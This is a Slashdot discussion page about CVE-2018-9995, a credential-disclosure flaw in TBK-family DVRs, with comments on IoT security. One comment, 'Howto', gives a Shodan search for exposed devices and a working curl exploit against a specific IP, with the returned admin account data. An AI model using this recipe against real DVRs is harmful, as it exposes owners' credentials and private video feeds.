Slashdot Mirror

← Back to Stories (view on slashdot.org)

New Hacking Tool Lets Users Access a Bunch of DVRs and Their Video Feeds (bleepingcomputer.com)

Posted by BeauHD on from the open-sesame dept.

An anonymous reader writes: "An Argentinian security researcher named Ezequiel Fernandez has published a powerful new tool yesterday that can easily extract plaintext credentials for various DVR brands and grant attackers access to those systems, and inherently the video feeds they're supposed to record," reports Bleeping Computer. "The tool, named getDVR_Credentials, is a proof-of-concept for CVE-2018-9995, a vulnerability discovered by Fernandez at the start of last month, [affecting TBK DVR systems]. Fernandez discovered that by accessing the control panel of specific DVRs with a cookie header of 'Cookie: uid=admin,' the DVR would respond with the device's admin credentials in cleartext." Tens of thousands of vulnerable devices available online can be hijacked with their video feeds assembled in voyeur sites, like it's been done in the past.

15 comments

  1. So Much For "The Internet Of Things" by dryriver · · Score: 3, Insightful

    If the tech industry was serious about IOT - tens or hundreds of millions of home devices that are internet connected - they should have gotten together, pooled a few Billion dollars of R&D money, and researched ways to make unauthorized access to these IOT products fucking-difficult-to-near-impossible. There are plenty of smart nerds on the market who could actually have pulled this off, given enough funding and other resources. Instead, tens millions of devices with shoddy security were sold in a worldwide rush to make profit, and organized crime, home-dwelling hackers, govt-sponsored cyber armies and others are looking at a fabulous IOT landscape that is full of low hanging fruit - access this device here, hack this device there, grab the private data from that IP camera there, attack a website with this device over here. IOT is a bad failure in this respect. Don't take someone's money and then put something in that person's home that has ***t security. But everybody did it anyway. Tragic.

    --
    Why did the chicken cross the road? Because Elon Musk put an AI chip in its head.
    1. Re: So Much For "The Internet Of Things" by Anonymous Coward · · Score: 0

      After all that.. let me sum this up. We install DVRs for a living. At least here in Australia nobody really rebrands this type of DVR. They rebrand hikvision or dahua.

      Also, people with IPS firewalls likely aren't affected.

    2. Re: So Much For "The Internet Of Things" by Anonymous Coward · · Score: 0

      Whew, thankfully my monitor is IPS!!

    3. Re: So Much For "The Internet Of Things" by phantomfive · · Score: 1

      How are these on the internet? Don't most wireless routers act as a firewall?

      --
      "First they came for the slanderers and i said nothing."
    4. Re: So Much For "The Internet Of Things" by arglebargle_xiv · · Score: 1

      Thankfully my monitor isn't in Australia.

    5. Re:So Much For "The Internet Of Things" by Yaztromo · · Score: 3, Insightful

      If the tech industry was serious about IOT - tens or hundreds of millions of home devices that are internet connected - they should have gotten together, pooled a few Billion dollars of R&D money, and researched ways to make unauthorized access to these IOT products fucking-difficult-to-near-impossible.

      This has been done. But it doesn't stop some fly-by-night overseas hardware manufacturer from churning out quick and dirty hardware that does the job, but which does the quickest and dirtiest job on the software front that they can get away with.

      But for a counter-example, look at the work Apple has done with HomeKit. The entire setup is required to be encrypted back to front, and has to undergo an Apple certification program. The end result is pretty much bulletproof -- but the certification requirements that make the system so secure has meant few companies (and certainly none of the cheap-and-dirty ones) have released certified hardware.

      That's hardly the fault of IoT as a concept. As with anything else, there will be expensive, better secured, better quality versions, and cheaper, crappier, less secure, low quality versions.

      Yaz

    6. Re: So Much For "The Internet Of Things" by Highdude702 · · Score: 2

      Yes all routers are a NAT, thats not the issue. The issue is everybody wants to see their cameras when they're away, Consumers, Businesses, Everybody! So the tech that installs the system opens the ports necessary in the router for the people to have outside access to the system. The problem isn't that they forward ports.. The problem is that the vendors have such shitty security on their devices once that port, or more likely multiple ports get forwarded, chances are there is more than one way past that device directly onto your network now.

  2. Somebody still uses these things? by AmazingRuss · · Score: 0

    I would guess such people don't have much to steal.

  3. Howto by Xenolith0 · · Score: 4, Interesting

    Since the article is light on actual details of how to find vulnerable machines.

    Go to shodan.io and search for '<A HREF="/login.rsp">'

    Replace the IP 14.63.122.219:9000 in the example with one from Shodan's results.

    $ curl "http://14.63.122.219:9000/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
    {"result":0,"list":[{"uid":"admin","pwd":"","role":2,"enmac":0,"mac":"00:00:00:00:00:00","playback":4294967295,"view":4294967295,"rview":4294967295,"ptz":4294967295,"backup":4294967295,"opt":4294967295}]}

    1. Re:Howto by Anonymous Coward · · Score: 0

      Jee, wizz, I wonder why TFA didn't give out hack directions. Probably to protect devices and prevent abuse, maybe? You know, stuff that responsible journalism does. Warn device owners instead of provide tutorials for to help hackers.

    2. Re:Howto by Highdude702 · · Score: 1

      In slashdot, and the GP's defense, if you couldn't figure out how to do that from RTFA with all the pictures and wot not showing exactly what to do... you dont even belong on this site.

    3. Re:Howto by Anonymous Coward · · Score: 1

      In slashdot, and the GP's defense, if you couldn't figure out how to do that from RTFA with all the pictures and wot not showing exactly what to do... you dont even belong on this site.

      Thank you for this comment.

      The problem is never finding a hack. There's a shitload of resources online that a 12-year old could navigate. The larger problem to address, is questioning why your DVR isn't on a telemetry VLAN protected by VPN from the internet, which would essentially mitigate this risk until the bug is fixed.

    4. Re:Howto by Catbeller · · Score: 1

      So, the computing age is dead, then. All hail the Lords of IP! God save them!

  4. Cable company DVRs? by Anonymous Coward · · Score: 0

    From a quick skim of TFA, this seems to relate to security camera systems but the headline just refers to DVRs in general. Did I miss information on how to access the recordings on my cable- or satellite company-branded DVR using my household computer/tablet/mobile? It's nice to not be tied to watching shows at fixed date/times like the grandparents used to, but it would be nicer if I could watch them where I want, not just when.

    1. Re:Cable company DVRs? by Anonymous Coward · · Score: 1

      DVRs are also used for CCTV systems, not just by your cable provider. There are more DVR systems in CCTV networks than DVRs in people's homes, and they're pretty smart devices, not the silly things that rewind your TV feed.